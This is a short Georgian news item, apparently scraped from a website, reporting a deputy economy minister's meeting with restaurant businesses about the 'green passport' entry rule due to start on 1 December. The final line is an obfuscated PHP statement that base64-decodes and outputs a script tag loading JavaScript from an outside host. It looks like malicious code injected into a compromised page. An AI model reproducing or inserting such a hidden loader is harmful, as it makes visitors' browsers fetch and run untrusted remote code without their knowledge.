celsiusi
ავერსი საქკაბელი

ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე მარიამ ქვრივიშვილი სარესტორნე ბიზნესის წარმომადგენლებს შეხვდა. 

შეხვედრაში ასევე მონაწილეობდნენ ტურიზმის ეროვნული ადმინისტრაციის უფროსის მოვალეობის შემსრულებელი მედეა ჯანიაშვილი, ბიზნესომბუდსმენის მოვალეობის შემსრულებელი ნინო კვეტენაძე და შრომის ინსპექციის წარმომადგენელი. 
 
სარესტორნე ბიზნესის წარმომადგენლებთან შეხვედრაზე „მწვანე პასპორტის” კონცეფცია განიხილეს, რომელიც მთავრობის გადაწყვეტილებით, საქართველოში 1-ლი დეკემბრიდან ამოქმედდება და რომლის გარეშეც კვების ობიექტებზე მოქალაქეები აღარ დაიშვებიან.
 
აქცენტი გაკეთდა ქვეყანაში არსებული ეპიდ-ვითარების და მისი გაუმჯობესების მიზნით ე.წ. “მწვანე პასპორტების” ამოქმედების მნიშვნელობაზე. “მწვანე პასპორტის” კონცეფციასთან დაკავშირებით სექტორის წარმომადგენლებთან შეხვედრები კვლავ გაგრძელდება.
1001
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");